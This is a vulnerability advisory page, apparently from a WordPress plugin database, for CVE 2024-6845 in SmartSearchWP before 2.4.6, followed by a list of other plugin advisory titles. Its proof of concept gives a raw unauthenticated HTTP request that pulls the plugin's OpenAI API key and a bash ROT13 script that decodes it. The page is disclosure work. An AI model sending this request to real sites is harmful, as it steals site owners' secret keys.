SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure | CVE 2024-6845 | Plugin Vulnerabilities

Description

The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key

Proof of Concept

Send the request below to retrieve the configured OpenAI secret key from the plugin configuration: 

```
POST /wp-json/wdgpt/v1/api-key HTTP/1.1
Host: HOST
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

{"key": "U2FsdGVkX1+X"}
```

Decode the returned ROT13 value manually or by using the below bash script

```
#!/bin/bash
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
```

Affects Plugins

Fixed in 2.4.6

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Kieran Burge

Submitter

Kieran Burge

Submitter website

https://prisminfosec.com/

Verified

Yes

WPVDB ID

cfaaa843-d89e-42d4-90d9-988293499d26

Timeline

Publicly Published

2024-09-04 (about 1 year ago)

Added

2024-09-04 (about 1 year ago)

Last Updated

2024-09-04 (about 1 year ago)

Other

Published

Title

Published

2023-05-12

Title

WPCS – WordPress Currency Switcher Professional < 1.2.0 - Subscriber+ Missing Authorization Checks

Published

2023-03-10

Title

GiveWP < 2.25.2 - Contributor+ Arbitrary Content Deletion

Published

2025-11-14

Title

Image Gallery – Photo Grid & Video Gallery < 2.12.29 - Author+ Arbitrary Image File Move

Published

2025-12-16

Title

Ultimate Member < 2.11.1 - Authenticated (Subscriber+) Profile Privacy Setting Bypass

Published

2024-07-16

Title

BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin < 1.1.6 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update and Arbitrary File Upload